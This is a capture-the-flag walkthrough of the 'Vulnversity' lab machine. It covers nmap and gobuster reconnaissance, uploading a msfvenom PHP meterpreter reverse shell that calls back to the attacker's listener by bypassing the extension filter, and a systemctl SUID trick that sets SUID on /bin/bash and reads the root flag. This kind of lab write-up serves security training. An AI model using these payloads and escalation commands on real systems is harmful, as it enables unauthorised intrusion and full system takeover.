Vulnversity
Recon
sudo nmap -sS -A -T4 10.10.129.126 -oN initial.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:10 EDT
Nmap scan report for 10.10.129.126
Host is up (0.16s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
| 256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
|_ 256 3050cb705a865722cb52d93634dca558 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/23%OT=21%CT=1%CU=30210%PV=Y%DS=2%DC=T%G=Y%TM=641C41F
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2023-03-23T08:11:29-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 1s
| smb2-time:
| date: 2023-03-23T12:11:30
|_ start_date: N/A
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 169.87 ms 10.8.0.1
2 170.48 ms 10.10.129.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.42 seconds
Scan for other ports
sudo nmap -sS -p- -T4 10.10.129.126 -oN full.nmap
Nmap scan report for 10.10.129.126
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
Nmap done: 1 IP address (1 host up) scanned in 907.61 seconds
Directory Busting
gobuster dir -u http://10.10.129.126:3333/ -w /usr/share/wordlists/dirb/big.txt

Compromise the webserver
Make a php msfvenom payload and try to upload it.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.8.64.134 LPORT=4444 -f raw > shell.php
Fuzz allowed extensions with Burp
intercept file upload request in burp. Send to intruder and then select the file extension as parameter(ensure selection after full stop) create a list of php extensions in payload list and check.



cp shell.php shell.phtml
Now upload it and it will be uploaded. but msfvenom shell kept on dying

So generated a php shell from pentest monkey using revshells which worked


Priv Escalation
search for SUID files
find / -perm -u=s -type f 2>/dev/null
Check GTFOBINS to exploit it and we have a working exploitation method
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

We can also directly cat out the flag using the command in the following manner
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
Last updated